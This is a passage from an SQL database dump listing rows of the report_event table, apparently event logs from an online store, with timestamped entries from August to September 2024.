(13308, '2024-08-21 21:11:50', 1, 2058, 0, 1, 1),
(13309, '2024-08-21 22:14:10', 1, 2061, 0, 1, 1),
(13310, '2024-08-21 23:14:44', 1, 2062, 0, 1, 1),
(13311, '2024-08-22 00:59:42', 1, 2054, 0, 1, 1),
(13312, '2024-08-22 01:15:04', 1, 2059, 0, 1, 1),
(13313, '2024-08-22 01:20:51', 1, 2059, 0, 1, 1),
(13314, '2024-08-22 01:39:16', 1, 2064, 0, 1, 1),
(13315, '2024-08-22 04:47:42', 1, 2055, 0, 1, 1),
(13316, '2024-08-22 05:32:06', 1, 2058, 0, 1, 1),
(13317, '2024-08-22 06:31:48', 1, 2060, 0, 1, 1),
(13318, '2024-08-22 06:31:52', 1, 2063, 0, 1, 1),
(13319, '2024-08-22 06:31:54', 1, 2058, 0, 1, 1),
(13320, '2024-08-22 06:31:58', 1, 2055, 0, 1, 1),
(13321, '2024-08-22 06:32:05', 1, 2061, 0, 1, 1),
(13322, '2024-08-22 06:32:10', 1, 2062, 0, 1, 1),
(13323, '2024-08-22 06:35:17', 1, 2054, 0, 1, 1),
(13324, '2024-08-22 06:36:00', 1, 2059, 0, 1, 1),
(13325, '2024-08-22 07:45:44', 1, 2064, 0, 1, 1),
(13326, '2024-08-22 08:36:58', 1, 2054, 0, 1, 1),
(13327, '2024-08-22 09:10:24', 1, 2060, 0, 1, 1),
(13328, '2024-08-22 09:10:26', 1, 2063, 0, 1, 1),
(13329, '2024-08-22 09:10:29', 1, 2058, 0, 1, 1),
(13330, '2024-08-22 09:10:33', 1, 2055, 0, 1, 1),
(13331, '2024-08-22 09:10:39', 1, 2061, 0, 1, 1),
(13332, '2024-08-22 09:10:59', 1, 2062, 0, 1, 1),
(13333, '2024-08-22 09:14:57', 1, 2054, 0, 1, 1),
(13334, '2024-08-22 09:15:47', 1, 2059, 0, 1, 1),
(13335, '2024-08-22 09:16:25', 1, 2064, 0, 1, 1),
(13336, '2024-08-22 15:41:12', 1, 2060, 0, 1, 1),
(13337, '2024-08-22 16:38:06', 1, 2060, 0, 1, 1),
(13338, '2024-08-22 16:57:02', 1, 2063, 0, 1, 1),
(13339, '2024-08-22 17:44:27', 1, 2058, 0, 1, 1),
(13340, '2024-08-22 19:06:09', 1, 2055, 0, 1, 1),
(13341, '2024-08-22 21:23:16', 1, 2058, 0, 1, 1),
(13342, '2024-08-22 21:26:46', 1, 2061, 0, 1, 1),
(13343, '2024-08-22 21:59:16', 1, 2054, 0, 1, 1),
(13344, '2024-08-22 22:09:05', 1, 2064, 0, 1, 1),
(13345, '2024-08-22 22:53:08', 1, 2062, 0, 1, 1),
(13346, '2024-08-23 01:35:34', 1, 2054, 0, 1, 1),
(13347, '2024-08-23 02:09:49', 1, 2059, 0, 1, 1),
(13348, '2024-08-23 02:39:18', 1, 2064, 0, 1, 1),
(13349, '2024-08-23 05:28:27', 1, 2061, 0, 1, 1),
(13350, '2024-08-23 05:56:42', 1, 2064, 0, 1, 1),
(13351, '2024-08-23 08:02:49', 1, 2054, 0, 1, 1),
(13352, '2024-08-23 10:11:16', 1, 2061, 0, 1, 1),
(13353, '2024-08-23 13:02:38', 1, 2059, 0, 1, 1),
(13354, '2024-08-23 17:22:53', 1, 2059, 0, 1, 1),
(13355, '2024-08-23 21:05:55', 1, 2064, 0, 1, 1),
(13356, '2024-08-23 21:33:29', 1, 2054, 0, 1, 1),
(13357, '2024-08-24 06:19:33', 1, 2058, 0, 1, 1),
(13358, '2024-08-24 07:40:06', 1, 2058, 0, 1, 1),
(13359, '2024-08-24 08:07:57', 1, 2062, 0, 1, 1),
(13360, '2024-08-24 09:10:25', 1, 2058, 0, 1, 1),
(13361, '2024-08-24 10:01:52', 1, 2054, 0, 1, 1),
(13362, '2024-08-24 13:15:52', 1, 2059, 0, 1, 1),
(13363, '2024-08-24 13:41:07', 1, 2055, 0, 1, 1),
(13364, '2024-08-24 14:18:03', 1, 2064, 0, 1, 1),
(13365, '2024-08-24 17:12:51', 1, 2063, 0, 1, 1),
(13366, '2024-08-24 17:45:07', 1, 2053, 0, 1, 1),
(13367, '2024-08-24 19:03:27', 1, 2062, 0, 1, 1),
(13368, '2024-08-25 00:32:09', 1, 2054, 0, 1, 1),
(13369, '2024-08-25 03:00:58', 1, 2058, 0, 1, 1),
(13370, '2024-08-25 03:01:02', 1, 2058, 0, 1, 1),
(13371, '2024-08-25 08:46:44', 1, 2063, 0, 1, 1),
(13372, '2024-08-25 11:05:52', 1, 2064, 0, 1, 1),
(13373, '2024-08-25 11:05:55', 1, 2064, 0, 1, 1),
(13374, '2024-08-25 13:44:35', 1, 2061, 0, 1, 1),
(13375, '2024-08-25 14:21:39', 1, 2054, 0, 1, 1),
(13376, '2024-08-25 14:50:47', 1, 2061, 0, 1, 1),
(13377, '2024-08-25 17:10:46', 1, 2059, 0, 1, 1),
(13378, '2024-08-25 17:10:49', 1, 2059, 0, 1, 1),
(13379, '2024-08-25 17:13:42', 1, 2058, 0, 1, 1),
(13380, '2024-08-25 18:04:57', 1, 2064, 0, 1, 1),
(13381, '2024-08-25 23:11:57', 1, 2059, 0, 1, 1),
(13382, '2024-08-26 03:57:57', 1, 2054, 0, 1, 1),
(13383, '2024-08-26 07:47:01', 1, 2064, 0, 1, 1),
(13384, '2024-08-26 09:14:54', 1, 2060, 0, 1, 1),
(13385, '2024-08-26 09:47:01', 1, 2058, 0, 1, 1),
(13386, '2024-08-26 11:58:27', 1, 2061, 0, 1, 1),
(13387, '2024-08-26 15:18:16', 1, 2054, 0, 1, 1),
(13388, '2024-08-26 19:01:58', 1, 2062, 0, 1, 1),
(13389, '2024-08-26 21:33:53', 1, 2064, 0, 1, 1),
(13390, '2024-08-27 02:25:14', 1, 2054, 0, 1, 1),
(13391, '2024-08-27 03:42:12', 1, 2063, 0, 1, 1),
(13392, '2024-08-27 04:56:48', 1, 2058, 0, 1, 1),
(13393, '2024-08-27 12:01:48', 1, 2054, 0, 1, 1),
(13394, '2024-08-27 12:01:53', 1, 2055, 0, 1, 1),
(13395, '2024-08-27 12:02:08', 1, 2064, 0, 1, 1),
(13396, '2024-08-27 12:02:12', 1, 2063, 0, 1, 1),
(13397, '2024-08-27 12:02:16', 1, 2062, 0, 1, 1),
(13398, '2024-08-27 12:02:19', 1, 2060, 0, 1, 1),
(13399, '2024-08-27 12:02:23', 1, 2059, 0, 1, 1),
(13400, '2024-08-27 12:02:27', 1, 2061, 0, 1, 1),
(13401, '2024-08-27 12:02:32', 1, 2058, 0, 1, 1),
(13402, '2024-08-27 12:08:18', 1, 2062, 0, 1, 1),
(13403, '2024-08-27 12:59:31', 1, 2061, 0, 1, 1),
(13404, '2024-08-27 14:50:52', 1, 2054, 0, 1, 1),
(13405, '2024-08-27 15:23:09', 1, 2059, 0, 1, 1),
(13406, '2024-08-27 18:24:09', 1, 2053, 0, 1, 1),
(13407, '2024-08-27 22:17:04', 1, 2060, 0, 1, 1),
(13408, '2024-08-27 22:17:07', 1, 2060, 0, 1, 1),
(13409, '2024-08-28 05:57:06', 1, 2054, 0, 1, 1),
(13410, '2024-08-28 06:03:20', 1, 2059, 0, 1, 1),
(13411, '2024-08-28 07:06:22', 1, 2055, 0, 1, 1),
(13412, '2024-08-28 08:28:22', 1, 2055, 0, 1, 1),
(13413, '2024-08-28 16:26:11', 1, 2058, 0, 1, 1),
(13414, '2024-08-28 16:26:20', 1, 2054, 0, 1, 1),
(13415, '2024-08-28 16:26:25', 1, 2064, 0, 1, 1),
(13416, '2024-08-28 16:26:41', 1, 2062, 0, 1, 1),
(13417, '2024-08-28 16:26:43', 1, 2055, 0, 1, 1),
(13418, '2024-08-28 16:26:50', 1, 2059, 0, 1, 1),
(13419, '2024-08-28 16:26:52', 1, 2063, 0, 1, 1),
(13420, '2024-08-28 16:26:55', 1, 2060, 0, 1, 1),
(13421, '2024-08-28 16:26:59', 1, 2061, 0, 1, 1),
(13422, '2024-08-28 16:27:23', 1, 2058, 0, 1, 1),
(13423, '2024-08-28 16:27:33', 1, 2064, 0, 1, 1),
(13424, '2024-08-28 16:27:41', 1, 2062, 0, 1, 1),
(13425, '2024-08-28 16:27:43', 1, 2055, 0, 1, 1),
(13426, '2024-08-28 16:27:51', 1, 2059, 0, 1, 1),
(13427, '2024-08-28 16:27:52', 1, 2063, 0, 1, 1),
(13428, '2024-08-28 16:27:53', 1, 2061, 0, 1, 1),
(13429, '2024-08-28 16:27:57', 1, 2054, 0, 1, 1),
(13430, '2024-08-28 16:28:03', 1, 2060, 0, 1, 1),
(13431, '2024-08-28 16:28:15', 1, 2053, 0, 1, 1),
(13432, '2024-08-28 18:42:04', 1, 2055, 0, 1, 1),
(13433, '2024-08-28 19:02:01', 1, 2054, 0, 1, 1),
(13434, '2024-08-28 21:23:51', 1, 2063, 0, 1, 1),
(13435, '2024-08-29 01:36:35', 1, 2063, 0, 1, 1),
(13436, '2024-08-29 03:49:14', 1, 2064, 0, 1, 1),
(13437, '2024-08-29 06:30:31', 1, 2054, 0, 1, 1),
(13438, '2024-08-29 09:12:28', 1, 2054, 0, 1, 1),
(13439, '2024-08-29 10:54:39', 1, 2059, 0, 1, 1),
(13440, '2024-08-29 10:54:42', 1, 2059, 0, 1, 1),
(13441, '2024-08-29 11:45:18', 1, 2062, 0, 1, 1),
(13442, '2024-08-29 22:08:40', 1, 2054, 0, 1, 1),
(13443, '2024-08-29 23:24:20', 1, 2063, 0, 1, 1),
(13444, '2024-08-29 23:36:06', 1, 2064, 0, 1, 1),
(13445, '2024-08-30 00:04:50', 1, 2064, 0, 1, 1),
(13446, '2024-08-30 00:29:07', 1, 2054, 0, 1, 1),
(13447, '2024-08-30 03:01:05', 1, 2058, 0, 1, 1),
(13448, '2024-08-30 03:04:21', 1, 2054, 0, 1, 1),
(13449, '2024-08-30 03:13:18', 1, 2061, 0, 1, 1),
(13450, '2024-08-30 05:39:43', 1, 2054, 0, 1, 1),
(13451, '2024-08-30 07:35:55', 1, 2064, 0, 1, 1),
(13452, '2024-08-30 09:29:47', 1, 2058, 0, 1, 1),
(13453, '2024-08-30 10:08:53', 1, 2054, 0, 1, 1),
(13454, '2024-08-30 13:54:58', 1, 2058, 0, 1, 1),
(13455, '2024-08-30 13:55:00', 1, 2058, 0, 1, 1),
(13456, '2024-08-30 13:55:43', 1, 2058, 0, 1, 1),
(13457, '2024-08-30 14:51:43', 1, 2061, 0, 1, 1),
(13458, '2024-08-30 16:07:56', 1, 2064, 0, 1, 1),
(13459, '2024-08-30 20:50:01', 1, 2061, 0, 1, 1),
(13460, '2024-08-31 00:16:49', 1, 2054, 0, 1, 1),
(13461, '2024-08-31 01:00:55', 1, 2058, 0, 1, 1),
(13462, '2024-08-31 01:26:53', 1, 2063, 0, 1, 1),
(13463, '2024-08-31 02:17:34', 1, 2054, 0, 1, 1),
(13464, '2024-08-31 05:36:03', 1, 2061, 0, 1, 1),
(13465, '2024-08-31 09:31:15', 1, 2054, 0, 1, 1),
(13466, '2024-08-31 14:06:44', 1, 2054, 0, 1, 1),
(13467, '2024-08-31 17:11:58', 1, 2064, 0, 1, 1),
(13468, '2024-08-31 23:23:53', 1, 2059, 0, 1, 1),
(13469, '2024-09-01 01:14:48', 1, 2059, 0, 1, 1),
(13470, '2024-09-01 02:58:31', 1, 2054, 0, 1, 1),
(13471, '2024-09-01 04:43:53', 1, 2058, 0, 1, 1),
(13472, '2024-09-01 09:12:43', 1, 2064, 0, 1, 1),
(13473, '2024-09-01 16:37:21', 1, 2053, 0, 1, 1),
(13474, '2024-09-01 17:24:48', 1, 2058, 0, 1, 1),
(13475, '2024-09-01 18:12:53', 1, 2054, 0, 1, 1),
(13476, '2024-09-01 18:27:56', 1, 2064, 0, 1, 1),
(13477, '2024-09-01 19:47:02', 1, 2054, 0, 1, 1),
(13478, '2024-09-01 20:37:33', 1, 2060, 0, 1, 1),
(13479, '2024-09-01 20:39:26', 1, 2060, 0, 1, 1),
(13480, '2024-09-01 20:47:22', 1, 2063, 0, 1, 1),
(13481, '2024-09-01 21:12:38', 1, 2058, 0, 1, 1),
(13482, '2024-09-01 22:01:02', 1, 2060, 0, 1, 1),
(13483, '2024-09-01 22:10:53', 1, 2063, 0, 1, 1),
(13484, '2024-09-01 22:35:49', 1, 2058, 0, 1, 1),
(13485, '2024-09-01 23:15:06', 1, 2060, 0, 1, 1),
(13486, '2024-09-01 23:25:16', 1, 2055, 0, 1, 1),
(13487, '2024-09-02 00:44:53', 1, 2061, 0, 1, 1),
(13488, '2024-09-02 00:48:05', 1, 2064, 0, 1, 1),
(13489, '2024-09-02 00:53:26', 1, 2054, 0, 1, 1),
(13490, '2024-09-02 01:03:05', 1, 2060, 0, 1, 1),
(13491, '2024-09-02 01:24:32', 1, 2062, 0, 1, 1),
(13492, '2024-09-02 01:46:53', 1, 2055, 0, 1, 1),
(13493, '2024-09-02 02:41:42', 1, 2060, 0, 1, 1),
(13494, '2024-09-02 02:51:57', 1, 2063, 0, 1, 1),
(13495, '2024-09-02 03:18:09', 1, 2058, 0, 1, 1),
(13496, '2024-09-02 03:24:03', 1, 2063, 0, 1, 1),
(13497, '2024-09-02 04:09:34', 1, 2055, 0, 1, 1),
(13498, '2024-09-02 04:28:06', 1, 2064, 0, 1, 1),
(13499, '2024-09-02 04:41:10', 1, 2054, 0, 1, 1),
(13500, '2024-09-02 05:31:59', 1, 2061, 0, 1, 1),
(13501, '2024-09-02 06:03:32', 1, 2062, 0, 1, 1),
(13502, '2024-09-02 06:13:46', 1, 2062, 0, 1, 1),
(13503, '2024-09-02 07:13:58', 1, 2060, 0, 1, 1),
(13504, '2024-09-02 07:43:42', 1, 2054, 0, 1, 1),
(13505, '2024-09-02 08:01:14', 1, 2059, 0, 1, 1),
(13506, '2024-09-02 08:14:43', 1, 2064, 0, 1, 1),
(13507, '2024-09-02 16:31:47', 1, 2055, 0, 1, 1),
(13508, '2024-09-02 17:08:33', 1, 2063, 0, 1, 1),
(13509, '2024-09-02 17:30:08', 1, 2054, 0, 1, 1),
(13510, '2024-09-02 18:18:24', 1, 2055, 0, 1, 1),
(13511, '2024-09-02 23:43:01', 1, 2058, 0, 1, 1),
(13512, '2024-09-03 02:59:13', 1, 2062, 0, 1, 1),
(13513, '2024-09-03 04:31:19', 1, 2061, 0, 1, 1),
(13514, '2024-09-03 05:26:37', 1, 2064, 0, 1, 1),
(13515, '2024-09-03 05:26:40', 1, 2064, 0, 1, 1),
(13516, '2024-09-03 05:26:40', 1, 2064, 0, 1, 1),
(13517, '2024-09-03 06:30:09', 1, 2054, 0, 1, 1),
(13518, '2024-09-03 12:29:01', 1, 2063, 0, 1, 1),
(13519, '2024-09-03 16:49:30', 1, 2064, 0, 1, 1),
(13520, '2024-09-03 17:44:44', 1, 2064, 0, 1, 1),
(13521, '2024-09-03 18:44:24', 1, 2060, 0, 1, 1),
(13522, '2024-09-03 19:14:46', 1, 2062, 0, 1, 1),
(13523, '2024-09-03 20:18:41', 1, 2054, 0, 1, 1),
(13524, '2024-09-04 00:46:24', 1, 2064, 0, 1, 1),
(13525, '2024-09-04 04:27:25', 1, 2054, 0, 1, 1),
(13526, '2024-09-04 10:49:11', 1, 2064, 0, 1, 1),
(13527, '2024-09-04 11:18:28', 1, 2063, 0, 1, 1),
(13528, '2024-09-04 11:26:17', 1, 2055, 0, 1, 1),
(13529, '2024-09-04 11:26:19', 1, 2055, 0, 1, 1),
(13530, '2024-09-04 11:26:52', 1, 2064, 0, 1, 1),
(13531, '2024-09-04 11:27:28', 1, 2058, 0, 1, 1),
(13532, '2024-09-04 11:27:44', 1, 2060, 0, 1, 1),
(13533, '2024-09-04 12:18:53', 1, 2064, 0, 1, 1),
(13534, '2024-09-04 16:01:00', 1, 2064, 0, 1, 1),
(13535, '2024-09-05 00:39:41', 1, 2062, 0, 1, 1),
(13536, '2024-09-05 00:45:18', 1, 2064, 0, 1, 1),
(13537, '2024-09-05 05:18:38', 1, 2063, 0, 1, 1),
(13538, '2024-09-05 05:27:57', 1, 2058, 0, 1, 1),
(13539, '2024-09-05 05:35:46', 1, 2061, 0, 1, 1),
(13540, '2024-09-05 13:45:49', 1, 2061, 0, 1, 1),
(13541, '2024-09-05 14:50:57', 1, 2054, 0, 1, 1),
(13542, '2024-09-05 16:50:25', 1, 2063, 0, 1, 1),
(13543, '2024-09-05 17:26:08', 1, 2062, 0, 1, 1),
(13544, '2024-09-05 19:39:08', 1, 2054, 0, 1, 1),
(13545, '2024-09-05 23:30:02', 1, 2055, 0, 1, 1),
(13546, '2024-09-06 02:13:56', 1, 2064, 0, 1, 1),
(13547, '2024-09-06 07:07:34', 1, 2061, 0, 1, 1),
(13548, '2024-09-06 07:07:36', 1, 2061, 0, 1, 1),
(13549, '2024-09-06 08:18:17', 1, 2054, 0, 1, 1),
(13550, '2024-09-06 08:18:30', 1, 2055, 0, 1, 1),
(13551, '2024-09-06 08:18:50', 1, 2058, 0, 1, 1),
(13552, '2024-09-06 08:19:00', 1, 2061, 0, 1, 1),
(13553, '2024-09-06 08:19:09', 1, 2060, 0, 1, 1),
(13554, '2024-09-06 08:19:20', 1, 2059, 0, 1, 1),
(13555, '2024-09-06 08:19:32', 1, 2063, 0, 1, 1),
(13556, '2024-09-06 08:19:40', 1, 2062, 0, 1, 1),
(13557, '2024-09-06 08:19:59', 1, 2064, 0, 1, 1),
(13558, '2024-09-06 09:18:31', 1, 2064, 0, 1, 1),
(13559, '2024-09-06 09:43:35', 1, 2059, 0, 1, 1),
(13560, '2024-09-06 11:01:23', 1, 2062, 0, 1, 1),
(13561, '2024-09-06 11:39:33', 1, 2060, 0, 1, 1),
(13562, '2024-09-06 11:56:04', 1, 2054, 0, 1, 1),
(13563, '2024-09-06 11:56:08', 1, 2055, 0, 1, 1),
(13564, '2024-09-06 11:56:22', 1, 2058, 0, 1, 1),
(13565, '2024-09-06 11:56:28', 1, 2061, 0, 1, 1),
(13566, '2024-09-06 11:56:36', 1, 2060, 0, 1, 1),
(13567, '2024-09-06 11:56:42', 1, 2059, 0, 1, 1),
(13568, '2024-09-06 11:56:50', 1, 2063, 0, 1, 1),
(13569, '2024-09-06 11:56:56', 1, 2062, 0, 1, 1),
(13570, '2024-09-06 11:57:03', 1, 2064, 0, 1, 1),
(13571, '2024-09-06 11:59:33', 1, 2053, 0, 1, 1),
(13572, '2024-09-06 12:15:58', 1, 2054, 0, 1, 1),
(13573, '2024-09-06 14:36:01', 1, 2058, 0, 1, 1),
(13574, '2024-09-06 16:27:53', 1, 2064, 0, 1, 1),
(13575, '2024-09-06 16:42:59', 1, 2061, 0, 1, 1),
(13576, '2024-09-06 17:55:13', 1, 2059, 0, 1, 1),
(13577, '2024-09-06 18:08:33', 1, 2054, 0, 1, 1),
(13578, '2024-09-06 20:36:14', 1, 2061, 0, 1, 1),
(13579, '2024-09-06 23:22:14', 1, 2054, 0, 1, 1),
(13580, '2024-09-07 01:15:52', 1, 2064, 0, 1, 1),
(13581, '2024-09-07 04:22:35', 1, 2054, 0, 1, 1),
(13582, '2024-09-07 04:35:56', 1, 2059, 0, 1, 1),
(13583, '2024-09-07 05:32:37', 1, 2061, 0, 1, 1),
(13584, '2024-09-07 10:52:46', 1, 2059, 0, 1, 1),
(13585, '2024-09-07 10:52:48', 1, 2059, 0, 1, 1),
(13586, '2024-09-07 10:52:49', 1, 2059, 0, 1, 1),
(13587, '2024-09-07 10:54:49', 1, 2064, 0, 1, 1),
(13588, '2024-09-07 11:01:49', 1, 2061, 0, 1, 1),
(13589, '2024-09-07 11:02:34', 1, 2064, 0, 1, 1),
(13590, '2024-09-07 11:03:49', 1, 2054, 0, 1, 1),
(13591, '2024-09-07 13:41:04', 1, 2053, 0, 1, 1),
(13592, '2024-09-07 13:49:41', 1, 2061, 0, 1, 1),
(13593, '2024-09-07 16:27:31', 1, 2053, 0, 1, 1),
(13594, '2024-09-07 16:59:05', 1, 2054, 0, 1, 1),
(13595, '2024-09-07 19:16:45', 1, 2060, 0, 1, 1),
(13596, '2024-09-07 23:36:54', 1, 2055, 0, 1, 1),
(13597, '2024-09-08 00:18:32', 1, 2059, 0, 1, 1),
(13598, '2024-09-08 00:36:48', 1, 2063, 0, 1, 1),
(13599, '2024-09-08 02:50:06', 1, 2060, 0, 1, 1),
(13600, '2024-09-08 04:55:47', 1, 2054, 0, 1, 1),
(13601, '2024-09-08 05:08:06', 1, 2064, 0, 1, 1),
(13602, '2024-09-08 10:16:16', 1, 2058, 0, 1, 1),
(13603, '2024-09-08 10:42:25', 1, 2062, 0, 1, 1),
(13604, '2024-09-08 13:21:06', 1, 2061, 0, 1, 1),
(13605, '2024-09-08 14:07:48', 1, 2064, 0, 1, 1),
(13606, '2024-09-08 20:44:54', 1, 2054, 0, 1, 1),
(13607, '2024-09-09 03:54:09', 1, 2064, 0, 1, 1),
(13608, '2024-09-09 08:25:57', 1, 2054, 0, 1, 1),
(13609, '2024-09-09 09:10:09', 1, 2061, 0, 1, 1),
(13610, '2024-09-09 10:00:43', 1, 2061, 0, 1, 1),
(13611, '2024-09-09 10:50:45', 1, 2058, 0, 1, 1),
(13612, '2024-09-09 11:12:52', 1, 2064, 0, 1, 1),
(13613, '2024-09-09 21:50:21', 1, 2059, 0, 1, 1),
(13614, '2024-09-09 22:43:13', 1, 2058, 0, 1, 1),
(13615, '2024-09-10 00:54:15', 1, 2063, 0, 1, 1),
(13616, '2024-09-10 01:11:48', 1, 2054, 0, 1, 1),
(13617, '2024-09-10 01:14:14', 1, 2062, 0, 1, 1),
(13618, '2024-09-10 01:34:12', 1, 2060, 0, 1, 1),
(13619, '2024-09-10 03:26:51', 1, 2060, 0, 1, 1),
(13620, '2024-09-10 07:43:22', 1, 2054, 0, 1, 1),
(13621, '2024-09-10 10:57:48', 1, 2054, 0, 1, 1),
(13622, '2024-09-10 11:19:08', 1, 2062, 0, 1, 1),
(13623, '2024-09-10 11:33:16', 1, 2064, 0, 1, 1),
(13624, '2024-09-10 13:19:12', 1, 2054, 0, 1, 1),
(13625, '2024-09-10 19:04:19', 1, 2063, 0, 1, 1),
(13626, '2024-09-10 22:07:19', 1, 2061, 0, 1, 1),
(13627, '2024-09-11 01:45:07', 1, 2062, 0, 1, 1),
(13628, '2024-09-11 05:00:52', 1, 2054, 0, 1, 1),
(13629, '2024-09-11 08:13:07', 1, 2060, 0, 1, 1),
(13630, '2024-09-11 11:42:17', 1, 2063, 0, 1, 1),
(13631, '2024-09-11 11:42:41', 1, 2064, 0, 1, 1),
(13632, '2024-09-11 11:55:29', 1, 2053, 0, 1, 1),
(13633, '2024-09-11 15:08:44', 1, 2054, 0, 1, 1),
(13634, '2024-09-11 15:31:44', 1, 2061, 0, 1, 1),
(13635, '2024-09-11 15:31:44', 1, 2064, 0, 1, 1),
(13636, '2024-09-11 15:31:44', 1, 2055, 0, 1, 1),
(13637, '2024-09-11 15:31:44', 1, 2064, 0, 1, 1),
(13638, '2024-09-11 15:31:44', 1, 2058, 0, 1, 1),
(13639, '2024-09-11 15:31:45', 1, 2064, 0, 1, 1),
(13640, '2024-09-11 15:32:47', 1, 2059, 0, 1, 1),
(13641, '2024-09-11 15:32:48', 1, 2062, 0, 1, 1),
(13642, '2024-09-11 15:32:49', 1, 2060, 0, 1, 1),
(13643, '2024-09-11 15:32:50', 1, 2053, 0, 1, 1),
(13644, '2024-09-11 15:32:51', 1, 2063, 0, 1, 1),
(13645, '2024-09-11 15:32:54', 1, 2054, 0, 1, 1),
(13646, '2024-09-11 15:32:59', 1, 2053, 0, 1, 1),
(13647, '2024-09-11 15:33:00', 1, 2053, 0, 1, 1),
(13648, '2024-09-11 15:40:37', 1, 2054, 0, 1, 1),
(13649, '2024-09-11 19:11:51', 1, 2063, 0, 1, 1),
(13650, '2024-09-11 19:53:06', 1, 2061, 0, 1, 1),
(13651, '2024-09-11 23:33:14', 1, 2054, 0, 1, 1),
(13652, '2024-09-12 03:36:27', 1, 2054, 0, 1, 1),
(13653, '2024-09-12 05:25:37', 1, 2063, 0, 1, 1),
(13654, '2024-09-12 05:29:38', 1, 2058, 0, 1, 1),
(13655, '2024-09-12 06:36:01', 1, 2061, 0, 1, 1),
(13656, '2024-09-12 06:43:10', 1, 2062, 0, 1, 1),
(13657, '2024-09-12 06:45:12', 1, 2059, 0, 1, 1),
(13658, '2024-09-12 06:45:13', 1, 2060, 0, 1, 1),
(13659, '2024-09-12 06:47:15', 1, 2064, 0, 1, 1),
(13660, '2024-09-12 07:01:18', 1, 2061, 0, 1, 1),
(13661, '2024-09-12 11:19:05', 1, 2060, 0, 1, 1),
(13662, '2024-09-12 11:19:32', 1, 2063, 0, 1, 1),
(13663, '2024-09-12 11:32:08', 1, 2063, 0, 1, 1),
(13664, '2024-09-12 11:35:17', 1, 2059, 0, 1, 1),
(13665, '2024-09-12 12:06:38', 1, 2058, 0, 1, 1),
(13666, '2024-09-12 12:16:31', 1, 2058, 0, 1, 1),
(13667, '2024-09-12 12:36:36', 1, 2060, 0, 1, 1),
(13668, '2024-09-12 12:40:36', 1, 2064, 0, 1, 1),
(13669, '2024-09-12 13:16:34', 1, 2055, 0, 1, 1),
(13670, '2024-09-12 15:43:16', 1, 2055, 0, 1, 1),
(13671, '2024-09-12 15:43:21', 1, 2060, 0, 1, 1),
(13672, '2024-09-12 15:59:39', 1, 2063, 0, 1, 1),
(13673, '2024-09-12 16:43:38', 1, 2058, 0, 1, 1),
(13674, '2024-09-12 16:58:45', 1, 2054, 0, 1, 1),
(13675, '2024-09-12 18:12:25', 1, 2055, 0, 1, 1),
(13676, '2024-09-12 18:56:45', 1, 2064, 0, 1, 1),
(13677, '2024-09-12 18:58:38', 1, 2058, 0, 1, 1),
(13678, '2024-09-12 19:38:28', 1, 2064, 0, 1, 1),
(13679, '2024-09-12 20:11:32', 1, 2061, 0, 1, 1),
(13680, '2024-09-12 20:23:34', 1, 2063, 0, 1, 1),
(13681, '2024-09-12 21:41:28', 1, 2060, 0, 1, 1),
(13682, '2024-09-12 21:48:11', 1, 2064, 0, 1, 1),
(13683, '2024-09-12 21:54:01', 1, 2063, 0, 1, 1),
(13684, '2024-09-12 22:08:24', 1, 2062, 0, 1, 1),
(13685, '2024-09-12 22:28:23', 1, 2058, 0, 1, 1),
(13686, '2024-09-12 22:43:02', 1, 2064, 0, 1, 1),
(13687, '2024-09-12 23:44:50', 1, 2055, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(13688, '2024-09-13 00:52:04', 1, 2055, 0, 1, 1),
(13689, '2024-09-13 01:27:43', 1, 2061, 0, 1, 1),
(13690, '2024-09-13 02:09:17', 1, 2062, 0, 1, 1),
(13691, '2024-09-13 02:21:45', 1, 2059, 0, 1, 1),
(13692, '2024-09-13 03:20:43', 1, 2063, 0, 1, 1),
(13693, '2024-09-13 03:20:47', 1, 2061, 0, 1, 1),
(13694, '2024-09-13 03:20:51', 1, 2055, 0, 1, 1),
(13695, '2024-09-13 03:20:54', 1, 2064, 0, 1, 1),
(13696, '2024-09-13 03:20:59', 1, 2060, 0, 1, 1),
(13697, '2024-09-13 03:21:02', 1, 2059, 0, 1, 1),
(13698, '2024-09-13 03:21:10', 1, 2058, 0, 1, 1),
(13699, '2024-09-13 03:21:35', 1, 2064, 0, 1, 1),
(13700, '2024-09-13 03:22:19', 1, 2062, 0, 1, 1),
(13701, '2024-09-13 03:22:22', 1, 2054, 0, 1, 1),
(13702, '2024-09-13 03:25:23', 1, 2061, 0, 1, 1),
(13703, '2024-09-13 03:25:35', 1, 2054, 0, 1, 1),
(13704, '2024-09-13 03:25:47', 1, 2059, 0, 1, 1),
(13705, '2024-09-13 03:25:50', 1, 2058, 0, 1, 1),
(13706, '2024-09-13 03:26:55', 1, 2055, 0, 1, 1),
(13707, '2024-09-13 03:27:31', 1, 2064, 0, 1, 1),
(13708, '2024-09-13 03:27:35', 1, 2053, 0, 1, 1),
(13709, '2024-09-13 03:28:03', 1, 2063, 0, 1, 1),
(13710, '2024-09-13 03:28:11', 1, 2062, 0, 1, 1),
(13711, '2024-09-13 03:28:34', 1, 2060, 0, 1, 1),
(13712, '2024-09-13 03:32:52', 1, 2054, 0, 1, 1),
(13713, '2024-09-13 03:51:53', 1, 2059, 0, 1, 1),
(13714, '2024-09-13 04:07:14', 1, 2064, 0, 1, 1),
(13715, '2024-09-13 04:23:57', 1, 2053, 0, 1, 1),
(13716, '2024-09-13 04:24:12', 1, 2063, 0, 1, 1),
(13717, '2024-09-13 04:24:15', 1, 2062, 0, 1, 1),
(13718, '2024-09-13 04:24:18', 1, 2060, 0, 1, 1),
(13719, '2024-09-13 04:24:21', 1, 2059, 0, 1, 1),
(13720, '2024-09-13 05:37:26', 1, 2054, 0, 1, 1),
(13721, '2024-09-13 07:40:31', 1, 2053, 0, 1, 1),
(13722, '2024-09-13 09:18:17', 1, 2054, 0, 1, 1),
(13723, '2024-09-13 09:25:22', 1, 2059, 0, 1, 1),
(13724, '2024-09-13 11:14:23', 1, 2062, 0, 1, 1),
(13725, '2024-09-13 13:20:51', 1, 2062, 0, 1, 1),
(13726, '2024-09-13 14:09:32', 1, 2060, 0, 1, 1),
(13727, '2024-09-13 14:25:32', 1, 2059, 0, 1, 1),
(13728, '2024-09-13 16:57:33', 1, 2060, 0, 1, 1),
(13729, '2024-09-13 17:10:00', 1, 2063, 0, 1, 1),
(13730, '2024-09-13 17:44:46', 1, 2058, 0, 1, 1),
(13731, '2024-09-13 17:57:48', 1, 2059, 0, 1, 1),
(13732, '2024-09-13 19:05:40', 1, 2060, 0, 1, 1),
(13733, '2024-09-13 19:26:54', 1, 2063, 0, 1, 1),
